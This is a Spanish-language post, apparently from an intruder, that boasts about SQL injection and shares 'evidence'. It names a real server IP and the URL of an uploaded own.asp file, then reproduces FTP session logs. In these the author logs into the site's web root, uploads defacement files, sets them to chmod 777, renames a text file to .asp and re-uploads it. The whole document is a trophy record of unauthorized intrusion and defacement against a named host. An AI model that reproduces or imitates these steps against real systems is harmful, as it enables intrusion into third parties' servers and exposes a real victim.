
DEJANDO UN NUEVO POST.... PARA QUE HABLO DE SEGURIDAD!!!!!!!!!!!! MEJOR DELEITENCE CON LO QUE PUEDE HACER LA SQL INJECTION xD
LES DEJO EL LOG Y EL URL DE LA EVIDENCIA........
http://72.15.152.15/~star/own.asp
ftp 72.15.152.15
Connected to 72.15.152.15.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 2 of 50 allowed.
220-Local time is now 12:33. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.
Name (72.15.152.15:XXX): XXX
331 User XXX OK. Password required
Password:
230-User XXX has group access to: XXX
230 OK. Current restricted directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd public_html
250 OK. Current directory is /public_html
ftp> put deface.htm
local: deface.htm remote: deface.htm
200 PORT command successful
150 Connecting to port 42823
226-File successfully transferred
226 0.122 seconds (measured here), 11.84 Kbytes per second
1483 bytes sent in 0.00 secs (12273.2 kB/s)
ftp> chmod 777 deface.htm
200 Permissions changed on deface.htm
ftp> del deface.htm
250 Deleted deface.htm
ftp> close
221-Goodbye. You uploaded 2 and downloaded 0 kbytes.
221 Logout.
ftp> quit
YA QUE NO SE PUDO ASI ....... INTENTE OTRA COSA..........
Connected to 72.15.152.15.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 2 of 50 allowed.
220-Local time is now 12:39. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.
Name (72.15.152.15:XXX): XXX
331 User XXX OK. Password required
Password:
230-User XXX has group access to: XXX
230 OK. Current restricted directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd public_html
250 OK. Current directory is /public_html
ftp> put own.txt
local: own.txt remote: own.txt
200 PORT command successful
421 Service not available, remote server has closed connection
send aborted
waiting for remote to finish abort
ftp> put owquitt
Not connected.
ftp>
ftp> quit
YA SABEN................ACA COMIENZA LA DESESPERACION....
Connected to 72.15.152.15.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 3 of 50 allowed.
220-Local time is now 12:40. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.
Name (72.15.152.15:XXX): XXX
331 User XXX OK. Password required
Password:
230-User XXX has group access to: XXX
230 OK. Current restricted directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd public_html
250 OK. Current directory is /public_html
ftp> ùput own.txt
?Invalid command
ftp> put own.txt
local: own.txt remote: own.txt
200 PORT command successful
150 Connecting to port 39197
226-File successfully transferred
226 0.122 seconds (measured here), 2.00 Kbytes per second
249 bytes sent in 0.00 secs (7598.9 kB/s)
ftp> chmod 777 own.txt
200 Permissions changed on own.txt
:O
ftp> rename own.txt own.asp
350 RNFR accepted - file exists, ready for destination
250 File successfully renamed or moved
ftp> chmod 777 own.asp
200 Permissions changed on own.asp
ftp> dir
200 PORT command successful
150 Connecting to port 43074
Connected to 72.15.152.15.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 3 of 50 allowed.
220-Local time is now 12:43. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.
Name (72.15.152.15:XXX): XXX
331 User XXX OK. Password required
Password:
230-User XXX has group access to: XXX
230 OK. Current restricted directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd public_html
250 OK. Current directory is /public_html
ftp> d
?Ambiguous command
ftp> del own.asp
250 Deleted own.asp
ftp> put own.asp
local: own.asp remote: own.asp
200 PORT command successful
150 Connecting to port 41715
226-File successfully transferred
226 0.122 seconds (measured here), 2.00 Kbytes per second
249 bytes sent in 0.00 secs (11052.9 kB/s)
ftp> dir
200 PORT command successful
150 Connecting to port 38167
ACA TERMINO........................
Non-authoritative answer:
15.152.15.72.in-addr.arpa name = uranus.van-dns.com.
Authoritative answers can be found from:
152.15.72.in-addr.arpa nameserver = nsp2.van-dns.com.
152.15.72.in-addr.arpa nameserver = nsp1.van-dns.com.